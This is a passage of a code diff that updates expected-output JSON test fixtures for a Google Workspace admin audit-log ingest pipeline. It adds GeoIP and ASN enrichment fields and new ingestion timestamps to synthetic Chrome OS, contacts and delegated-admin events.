"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING", @@ -97,6 +109,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -106,7 +130,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668040300Z", + "ingested": "2021-12-14T14:44:19.076073656Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "CHANGE_DEVICE_STATE", @@ -161,6 +185,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -170,7 +206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668045400Z", + "ingested": "2021-12-14T14:44:19.076074073Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_APPLICATION_SETTING", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668050400Z", + "ingested": "2021-12-14T14:44:19.076074432Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "SEND_CHROME_OS_DEVICE_COMMAND", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668056100Z", + "ingested": "2021-12-14T14:44:19.076074761Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_ANNOTATION", @@ -352,6 +412,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -361,7 +433,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668060700Z", + "ingested": "2021-12-14T14:44:19.076075097Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_SETTING", @@ -415,6 +487,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -424,7 +508,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668065200Z", + "ingested": "2021-12-14T14:44:19.076075487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_STATE", @@ -477,6 +561,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -486,7 +582,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668069700Z", + "ingested": "2021-12-14T14:44:19.076075818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING", @@ -542,6 +638,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -551,7 +659,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668073700Z", + "ingested": "2021-12-14T14:44:19.076076153Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINT_SERVER", @@ -606,6 +714,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -615,7 +735,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668078700Z", + "ingested": "2021-12-14T14:44:19.076076484Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINT_SERVER", @@ -670,6 +790,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -679,7 +811,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668084500Z", + "ingested": "2021-12-14T14:44:19.076076985Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINT_SERVER", @@ -734,6 +866,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -743,7 +887,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668090800Z", + "ingested": "2021-12-14T14:44:19.076077764Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINTER", @@ -798,6 +942,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -807,7 +963,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668096500Z", + "ingested": "2021-12-14T14:44:19.076078331Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINTER", @@ -862,6 +1018,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -871,7 +1039,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668102100Z", + "ingested": "2021-12-14T14:44:19.076078668Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINTER", @@ -924,6 +1092,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -933,7 +1113,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668107800Z", + "ingested": "2021-12-14T14:44:19.076079009Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_SETTING", @@ -987,6 +1167,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -996,7 +1188,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668113500Z", + "ingested": "2021-12-14T14:44:19.076079410Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_USER_SETTING", @@ -1055,6 +1247,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1064,7 +1268,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668136600Z", + "ingested": "2021-12-14T14:44:19.076079851Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "ISSUE_DEVICE_COMMAND", @@ -1117,6 +1321,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1126,7 +1342,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668142200Z", + "ingested": "2021-12-14T14:44:19.076080178Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", @@ -1181,6 +1397,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1190,7 +1418,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668147400Z", + "ingested": "2021-12-14T14:44:19.076080517Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", @@ -1245,6 +1473,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1254,7 +1494,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668152700Z", + "ingested": "2021-12-14T14:44:19.076080853Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "UPDATE_DEVICE", @@ -1309,6 +1549,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1318,7 +1570,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668158Z", + "ingested": "2021-12-14T14:44:19.076081245Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json index 5231f1f2614..8590185f715 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.339486Z", + "ingested": "2021-12-14T14:44:22.362665935Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json index eeb8e6f93f2..d6d247c3005 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493568900Z", + "ingested": "2021-12-14T14:44:22.555163216Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ASSIGN_ROLE", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493582300Z", + "ingested": "2021-12-14T14:44:22.555185057Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "CREATE_ROLE", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": 